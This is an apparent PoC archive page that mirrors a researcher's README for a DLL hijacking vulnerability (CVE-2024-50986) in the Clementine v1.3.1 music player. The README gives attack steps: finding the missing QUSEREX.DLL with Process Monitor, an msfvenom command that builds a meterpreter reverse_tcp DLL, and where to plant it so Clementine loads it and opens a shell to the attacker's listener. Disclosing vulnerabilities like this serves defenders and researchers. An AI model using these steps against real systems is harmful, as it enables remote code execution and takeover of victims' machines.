Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-50986 PoC — Clementine 安全漏洞

Source
https://github.com/riftsandroses/CVE-2024-50986
Associated Vulnerability
Title:Clementine 安全漏洞 (CVE-2024-50986)
Description:An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file.
Description
An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file (DLL Hijacking)
Readme
# CVE-20224-50986: DLL Hijacking Exploit for Clementine

**Description:** An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file. 

**Version Affected:** Clementine v.1.3.1

**Researcher:** Utkarsh (r1971d3) [LinkedIn](https://www.linkedin.com/in/r1971d3/)

**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-50986

**Vulnerability Type:** Untrusted Search Path

**Affected Component:** QUSEREX.DLL

## Proof-of-Concept Exploit
### Attack Vector
To exploit this vulnerability, an attacker must craft a malicious DLL named QUSEREX.DLL and place it in the directory: C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\. When the Clementine application is launched, it will load the malicious DLL, executing the attacker's code.
### Description & Usage
1. Use Process Monitor (procmon) with appropriate filters to identify missing DLLs and track where Clementine is searching for them within the Windows Operating System 

![Capture_3](https://github.com/user-attachments/assets/ea567275-8760-4897-a66d-c286d8c94320)


2. The search reveals that the DLL "QUSEREX.DLL" is being looked for in multiple locations, including C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\

![Capture_4](https://github.com/user-attachments/assets/6664d628-bc69-4e3d-91d8-b228fcfce2e2)


3. A malicious DLL is created using msfvenom with the following command:
```bash
sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL
```

![Capture_5](https://github.com/user-attachments/assets/0dcbb555-9416-4714-8621-4e513dadad27)


4. This malicious DLL is placed in the directory C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\, where it is successfully loaded by Clementine. 

![Capture_6](https://github.com/user-attachments/assets/a57fce43-b572-4eb0-b380-a79afa7d1256)


5. Using msfconsole, a staged payload is sent through the reverse shell, resulting in a meterpreter shell session being obtained in the C:\Program Files (x86)\Clementine\projectm-presets directory on the target machine. 

![Capture_8](https://github.com/user-attachments/assets/0e826edf-9727-492c-b3c2-876d5b0d13c6)

![Capture_7](https://github.com/user-attachments/assets/f3d22843-f315-42fe-aea3-8f905145ab8a)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →